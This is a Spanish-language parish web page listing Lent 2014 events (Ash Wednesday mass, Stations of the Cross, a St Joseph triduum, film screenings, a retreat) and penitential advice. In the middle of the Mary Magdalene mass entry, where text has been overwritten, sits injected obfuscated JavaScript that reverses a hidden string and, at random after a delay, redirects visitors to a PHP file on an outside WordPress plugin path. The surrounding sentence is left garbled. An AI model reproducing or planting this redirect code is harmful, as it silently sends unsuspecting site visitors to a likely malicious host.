Cuaresma 2014

Miércoles de ceniza

Misa con imposición de ceniza (05 de marzo) 7.00 pm.

Liturgia Penitencial con confesiones

Domingo II (09 de marzo) y III (16 de marzo) de cuaresma 5.00 pm.

Via Crucis

Todos los viernes de cuaresma (7, 14, 21, 28 de marzo) en el templo parroquial 8.00 pm.
Via crucis por las calles (Domingo 06 de abril) 8.00 pm.

Triduo en honor a San José

16 – 18 de marzo 7.00 pm.
Misa solemne de la fiesta (19 de marzo) a las 7.00m pm.

Películas

“La Pasión” (2009) – Miniserie de la BBC y HBO
(Miércoles 12) 7.00 pm.
“La Pasión de Cristo” (2004) – Mel Gibson
(Miércoles 26) 7.00 pm.

Las películas se emitirán en el auditorio de la casa de retiro “San Francisco Solano” – Jr. Amazonas 170.

Retiro parroquial

Del 21 al 23 de marzo
Casa de espiritualidad Santa Rosa – Jr. Chancay (frente al Arzobispado)
Informes e inscripciones en la oficina parroquial.

Misa en honor a María Magdalena

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando su conversión
Martes 01 de abril – 7.00 pm.

Recomendaciones:

Vivir este tiempo como una oportunidad para convertirnos más, por eso, busca la confesión ante el sacerdote, practica obras de caridad que te hagan más generoso y menos egoísta.
Recuerda que todos los viernes de cuaresma es día de abstinencia, es decir, como señal de penitencia y reparación de los pecados no se puede comer carne (obliga a partir de los catorce años). También, puedes cambiar esta penitencia por alguna otra cosa que te cueste más y te ayude en tu lucha contra el pecado.
Los niños también pueden hacer penitencia, guiados y orientados por sus padres, por ejemplo menos videojuegos, internet, televisión, o algo que ayude más al niño a ser obediente y responsable.

1. También se impondrá la ceniza en todas las misas del primer domingo de cuaresma.
  2. La primera y última estación del Via Crucis se hará en el templo parroquial.

Assign a menu in the Left Menu options.